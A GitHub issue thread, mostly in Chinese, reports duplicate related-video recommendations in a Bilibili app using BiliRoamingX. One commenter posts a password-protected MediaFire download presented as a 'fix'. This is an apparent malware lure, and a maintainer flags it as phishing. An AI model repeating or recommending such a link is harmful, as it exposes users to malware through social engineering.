### ISSUE TITLE
[BUG] 

### ISSUE THREAD

**Issue by shuaigekda** [BiliRoamingX/BiliRoamingX#429]
### 系统版本

MIUI14

### Android 版本

15

### 哔哩哔哩版本

Play 版（国际版）

### 哔哩哔哩版本号

1.23.1

### 问题描述

最新版本播放视频的相关视频出现重复推荐，完全一致的推荐在大概十个视频之后又出现一遍

### 复现步骤

1.打开一个视频播放
2.看下方推荐视频下滑

### 日志

[log_bilibili.zip](https://github.com/user-attachments/files/16756275/log_bilibili.zip)

### 截图或录屏

![Screenshot_2024-08-27-11-53-25-55](https://github.com/user-attachments/assets/dea6314d-4cae-4f43-99bf-e3f8ecfa311c)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by shuaigekda** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

I have downloaded and unzipped the fixer tool, but how does a windows program fix an android app

**Comment by zjns** [comment]
@shuaigekda 明显是钓鱼骗子，你在干什么

**Comment by zjns** [comment]
这是 B 站的问题
